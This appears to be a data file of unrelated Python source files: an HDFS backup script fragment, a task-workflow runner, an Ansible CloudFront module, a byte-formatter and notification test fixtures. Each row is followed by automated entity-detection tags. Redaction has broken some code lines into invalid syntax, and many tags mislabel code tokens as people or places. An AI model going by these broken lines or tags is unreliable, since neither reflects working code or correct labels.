ret = os.system(""hdfs dfs -mv /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT_LD+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/"")
#先删除备表当天数据
ret = os.system(""hdfs dfs -rm -r /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")
#从当天原表复制一份全量到备表
ret = os.system(""hdfs dfs -cp -f /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO/""+V_DT+"".parquet /""+dbname+""/F_CI_XDXT_CUSTOMER_INFO_BK/""+V_DT+"".parquet"")
",7703,"[['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']]"
96,"#!/usr/bin/python
""""""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: Eric Shook (dummy@email.com)
""""""
import os
import datetime
import time
import re
import subprocess
from Queue import Queue
#from threading import Thread
import threading
import sys,getopt
'''
The workflow script accepts a tasklist file, which contains a list of taskfiles.
A task may represent a simulation of an ABM or climate model. Tasks can be run
simultaneously if there are no dependencies or ordered in the case of
dependencies. Tasks may also include pre-processing or post-processing tasks.
'''
# TODO: Logging may be useful if the workflow becomes long
# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks
# However, it would be better to include in the taskfile the number of cores needed
# and define the number of cores available, enabling the workflow system to manage core allocation
# Global variables
# The number of threads used to handle tasks is passed as a parameter
num_threads=0
# Array of threads (so they can be killed if needed)
threads=[]
# Array of task workflow numbers (one per thread/worker)
threadtasknums=[]
# Task queue
taskqueue=Queue()
# This function handles executing a task defined by a taskfile
def runtask(taskfile):
# Read and parse the taskfile with the following format
# Note additional parameters will likely be added based on need (e.g., CWD, data-dir)
'''
program: /path/to/executable_with_a_name
parameters: param1 -Optionalconfiguration param2 -AnotherParameter
'''
with open(taskfile,'r') as f:
# Set the required parameters as None for error checking at the end
program=None
parameters=None
for line in f:
if line.startswith(""program:""):
# Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())
program=line.split("":"",1)[1].strip()
#print ""Program=""+program
if line.startswith(""parameters:""):
# Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())
parameters=line.split("":"",1)[1].strip()
#print ""Parameters=""+parameters
# Error checking for required parameters
if program==None:
raise Exception(""program missing in taskfile"",taskfile)
if parameters==None:
raise Exception(""parameters missing in taskfile"",taskfile)
print ""Calling program=""+program,parameters
'''
In future versions that have defined input,output,stdout,etc.
there could be more logic here to:
- run each model in a defined directory
- output stdout,stderr in the directory
- package up output files for easier transfer
- ...
'''
returncode=subprocess.check_call(program+"" ""+parameters,shell=True)
# A task worker loops while there are tasks left in the taskqueue
# Input parameter is a thread id (tid)
def taskworker(tid):
while not taskqueue.empty():
taskfile=taskqueue.get()
tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip()
tasknum=re.sub(""\D"", """", tasknum)
#print ""tid="",tid
threadtasknums[tid]=int(tasknum)
# While there is a dependency problem (lower order task numbers are still being processed)
# then spintwait
mintasknum=min(threadtasknums)
while threadtasknums[tid]>mintasknum:
#print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i]
#if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum
# break # then there are no dependencies, so you can break out of this infinite loop
time.sleep(1) # this is a spin-wait loop
mintasknum=min(*threadtasknums)
print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now())
try:
runtask(taskfile)
except:
exit(1)
taskqueue.task_done()
threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn't influence dependencies
print ""Thread"",tid,""quitting, because taskqueue is empty""
# Main program code
def main():
print ""Starting node workflow""
try:
opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""])
except getopt.GetoptError:
print ""workflow.py -n -t ""
sys.exit(1)
# Set model filename and experiment name based on command-line parameter
num_threads=0
tasklistfile=""""
for opt, arg in opts:
if opt in (""-n"", ""--numthreads""):
num_threads=int(arg)
if opt in (""-t"", ""--tasklist""):
tasklistfile=arg
err=0
if num_threads<=0:
print "" [ ERROR ] Number of threads must be greater than 0""
err=1
if tasklistfile=="""":
print "" [ ERROR ] Must provide tasklistfile""
err=1
if err==1:
print ""workflow.py -n -t ""
sys.exit(1)
print ""Executing in current directory :"",os.getcwd()
print ""Reading tasklist file""
with open(tasklistfile,'r') as f:
taskfiles = f.readlines()
f.close()
# tasksdir = 'tasks/'
# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process
taskfiles.sort()
print ""Starting task queue""
for taskfile in taskfiles:
taskqueue.put(taskfile.strip())
print ""Task queue contains "",taskqueue.qsize(),"" tasks""
# Start the workflow engine
# Currently the logic is simple -> one task==one thread==one core but that will need
# to be modified to account for multithreaded models (agent-based and climate)
# so eventually this will need to parse the task to determine the number of cores
# needed by the task and dynamically manage the number of tasks running simultaneously
print ""Starting "",num_threads,"" threads""
for i in range(num_threads):
threadtasknums.append(-1)
t=threading.Thread(target=taskworker,args=(i,))
t.daemon=True
t.setDaemon(True)
t.start()
threads.append(t)
# Now we wait until all of the tasks are finished.
print ""Waiting for threads to finish""
# Normally you can use a blocking .join, but then you cannot kill the process
# So instead we spin-wait and catch ^C so a user can kill this process.
# while threading.activeCount() > 0:
# time.sleep(20)
while taskqueue.qsize()>0:
time.sleep(1)
print ""taskqueue size"",taskqueue.qsize()
''' # FIXME: Need to clean up this code, which was used for testing ^C
try:
time.sleep(5) # Wait 5 seconds before checking again
# FIXME: In production this should be changed to 30
# If Ctrl+C or other error, kill all of the threads
except:
while not taskqueue.empty(): # Empty the queue
taskqueue.get()
for i in threads:
i.kill_received=True
i.kill()
exit(1)
'''
print ""Joining taskqueue""
# At this point all of the tasks should be finished so we join them
notfinished=1
while notfinished==1:
notfinished=0
for i in range(num_threads):
if threadtasknums[i]<999999:
notfinished=1
time.sleep(1)
#while not taskqueue.join(1):
# time.sleep(1)
print ""Finished node workflow""
# Run main
if __name__==""__main__"":
main()
",7938,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', ""getopt\n\n'""], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split(""/"",1)[1].split(""'], ['PERSON', 'tasknum=re.sub(""\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']]"
97,"#!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: ""2.5""
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
- A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. '/foo/bar/*'
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.PI:KEY
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
""""""
Handles CloudFront service calls to AWS for invalidations
""""""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn(""InvalidationBatch target paths are not modifiable. ""
""To make a new invalidation please update caller_reference."")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
class CloudFrontInvalidationValidationManager(object):
""""""
Manages CloudFront validations for invalidation batches
""""""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg=""distribution_id or alias must be specified"")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg=""Error validating parameters."")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list[""Quantity""] = len(invalidation_batch)
aws_list[""Items""] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg=""Error validating invalidation batch."")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
",10484,"[['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', ""00:00'\n i""], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', ""caller_reference = module.params.get('caller_reference'""], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']]"
98,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND
# Yves Junqueira (dummy@email.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)
def formatbytes(sizeint, configdict=None, **configs):
""""""
Given a file size as an integer, return a nicely formatted string that
represents the size. Has various options to control it's output.
You can pass in a dictionary of arguments or keyword arguments. Keyword
arguments override the dictionary and there are sensible defaults for options
you don't set.
Options and defaults are as follows :
* ``forcekb = False`` - If set this forces the output to be in terms
of kilobytes and bytes only.
* ``largestonly = True`` - If set, instead of outputting
``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest
denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes``
* ``kiloname = 'Kbytes'`` - The string to use for kilobytes
* ``meganame = 'Mbytes'`` - The string to use for Megabytes
* ``bytename = 'bytes'`` - The string to use for bytes
* ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``,
notice there is no space.
Example outputs : ::
19Mbytes, 75Kbytes, 255bytes
2Kbytes, 0bytes
23.8Mbytes
.. note::
It currently uses the plural form even for singular.
""""""
defaultconfigs = { 'forcekb' : False,
'largestonly' : True,
'kiloname' : 'Kbytes',
'meganame' : 'Mbytes',
'bytename' : 'bytes',
'nospace' : True}
if configdict is None:
configdict = {}
for entry in configs:
# keyword parameters override the dictionary passed in
configdict[entry] = configs[entry]
#
for keyword in defaultconfigs:
if not configdict.has_key(keyword):
configdict[keyword] = defaultconfigs[keyword]
#
if configdict['nospace']:
space = ''
else:
space = ' '
#
mb, kb, rb = bytedivider(sizeint)
if configdict['largestonly']:
if mb and not configdict['forcekb']:
return stringround(mb, kb)+ space + configdict['meganame']
elif kb or configdict['forcekb']:
if mb and configdict['forcekb']:
kb += 1024*mb
return stringround(kb, rb) + space+ configdict['kiloname']
else:
return str(rb) + space + configdict['bytename']
else:
outstr = ''
if mb and not configdict['forcekb']:
outstr = str(mb) + space + configdict['meganame'] +', '
if kb or configdict['forcekb'] or mb:
if configdict['forcekb']:
kb += 1024*mb
outstr += str(kb) + space + configdict['kiloname'] +', '
return outstr + str(rb) + space + configdict['bytename']
",3822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']]"
99,"import random
import uuid
from datetime import date, datetime, timedelta
import pytest
from app import db
from app.dao import fact_processing_time_dao
from app.dao.email_branding_dao import dao_create_email_branding
from app.dao.inbound_sms_dao import dao_create_inbound_sms
from app.dao.invited_org_user_dao import save_invited_org_user
from app.dao.invited_user_dao import save_invited_user
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import dao_create_notification
from app.dao.organisation_dao import (
dao_add_service_to_organisation,
dao_create_organisation,
)
from app.dao.permissions_dao import permission_dao
from app.dao.service_callback_api_dao import save_service_callback_api
from app.dao.service_data_retention_dao import insert_service_data_retention
from app.dao.service_inbound_api_dao import save_service_inbound_api
from app.dao.service_permissions_dao import dao_add_service_permission
from app.dao.service_sms_sender_dao import (
dao_update_service_sms_sender,
update_existing_sms_sender_with_inbound_number,
)
from app.dao.services_dao import dao_add_user_to_service, dao_create_service
from app.dao.templates_dao import dao_create_template, dao_update_template
from app.dao.users_dao import save_model_user
from app.models import (
EMAIL_TYPE,
KEY_TYPE_NORMAL,
LETTER_TYPE,
MOBILE_TYPE,
SMS_TYPE,
AnnualBilling,
ApiKey,
BroadcastEvent,
BroadcastMessage,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastStatusType,
Complaint,
DailySortedLetter,
Domain,
EmailBranding,
FactBilling,
FactNotificationStatus,
FactProcessingTime,
InboundNumber,
InboundSms,
InvitedOrganisationUser,
InvitedUser,
Job,
LetterBranding,
LetterRate,
Notification,
NotificationHistory,
Organisation,
Permission,
Rate,
ReturnedLetter,
Service,
ServiceCallbackApi,
ServiceContactList,
ServiceEmailReplyTo,
ServiceGuestList,
ServiceInboundApi,
ServiceLetterContact,
ServicePermission,
ServiceSmsSender,
Template,
TemplateFolder,
User,
WebauthnCredential,
)
def create_user(
*,
mobile_number=""+447700900986"",
dummy@email.com"",
state='active',
id_=None,
name=""Test User""
):
data = {
'id': id_ or uuid.uuid4(),
'name': name,
'email_address': email,
'password': 'password',
'mobile_number': mobile_number,
'state': state
}
user = User.query.filter_by(email_address=email).first()
if not user:
user = User(**data)
save_model_user(user, validated_email_access=True)
return user
def create_permissions(user, service, *permissions):
permissions = [
Permission(service_id=service.id, user_id=user.id, permission=p)
for p in permissions
]
permission_dao.set_user_service_permission(user, service, permissions, _commit=True)
def create_service(
user=None,
service_name=""Sample service"",
service_id=None,
restricted=False,
count_as_live=True,
service_permissions=None,
research_mode=False,
active=True,
email_from=None,
prefix_sms=True,
message_limit=1000,
organisation_type='central',
check_if_service_exists=False,
go_live_user=None,
go_live_at=None,
crown=True,
organisation=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
if check_if_service_exists:
service = Service.query.filter_by(name=service_name).first()
if (not check_if_service_exists) or (check_if_service_exists and not service):
service = Service(
name=service_name,
message_limit=message_limit,
restricted=restricted,
email_from=email_from if email_from else service_name.lower().replace(' ', '.'),
created_by=user if user else create_user(dummy@email.com())),
prefix_sms=prefix_sms,
organisation_type=organisation_type,
organisation=organisation,
go_live_user=go_live_user,
go_live_at=go_live_at,
crown=crown,
purchase_order_number=purchase_order_number,
billing_contact_names=billing_contact_names,
billing_contact_email_addresses=billing_contact_email_addresses,
billing_reference=billing_reference,
)
dao_create_service(
service,
service.created_by,
service_id,
service_permissions=service_permissions,
)
service.active = active
service.research_mode = research_mode
service.count_as_live = count_as_live
else:
if user and user not in service.users:
dao_add_user_to_service(service, user)
return service
def create_service_with_inbound_number(
inbound_number='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
inbound = create_inbound_number(number=inbound_number, service_id=service.id)
update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,
sms_sender=inbound_number,
inbound_number_id=inbound.id)
return service
def create_service_with_defined_sms_sender(
sms_sender_value='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
dao_update_service_sms_sender(service_id=service.id,
service_sms_sender_id=sms_sender.id,
is_default=True,
sms_sender=sms_sender_value)
return service
def create_template(
service,
template_type=SMS_TYPE,
template_name=None,
subject='Template subject',
content='Dear Sir/Madam, Hello. Yours Truly, The Government.',
reply_to=None,
hidden=False,
archived=False,
folder=None,
postage=None,
process_type='normal',
contact_block_id=None
):
data = {
'name': template_name or '{} Template Name'.format(template_type),
'template_type': template_type,
'content': content,
'service': service,
'created_by': service.created_by,
'reply_to': reply_to,
'hidden': hidden,
'folder': folder,
'process_type': process_type,
}
if template_type == LETTER_TYPE:
data[""postage""] = postage or ""second""
if contact_block_id:
data['service_letter_contact_id'] = contact_block_id
if template_type != SMS_TYPE:
data['subject'] = subject
template = Template(**data)
dao_create_template(template)
if archived:
template.archived = archived
dao_update_template(template)
return template
def create_notification(
template=None,
job=None,
job_row_number=None,
to_field=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
personalisation=None,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
scheduled_for=None,
normalised_to=None,
one_off=False,
reply_to_text=None,
created_by_id=None,
postage=None,
document_download_count=None,
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if to_field is None:
to_field = '+447700900855' if template.template_type == SMS_TYPE else dummy@email.com'
if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'):
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if not one_off and (job is None and api_key is None):
# we did not specify in test - lets create it
api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()
if not api_key:
api_key = create_api_key(template.service, key_type=key_type)
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': uuid.uuid4(),
'to': to_field,
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'personalisation': personalisation,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'normalised_to': normalised_to,
'reply_to_text': reply_to_text,
'created_by_id': created_by_id,
'postage': postage,
'document_download_count': document_download_count,
}
notification = Notification(**data)
dao_create_notification(notification)
return notification
def create_notification_history(
template=None,
job=None,
job_row_number=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
created_by_id=None,
postage=None,
id=None
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if status != 'created':
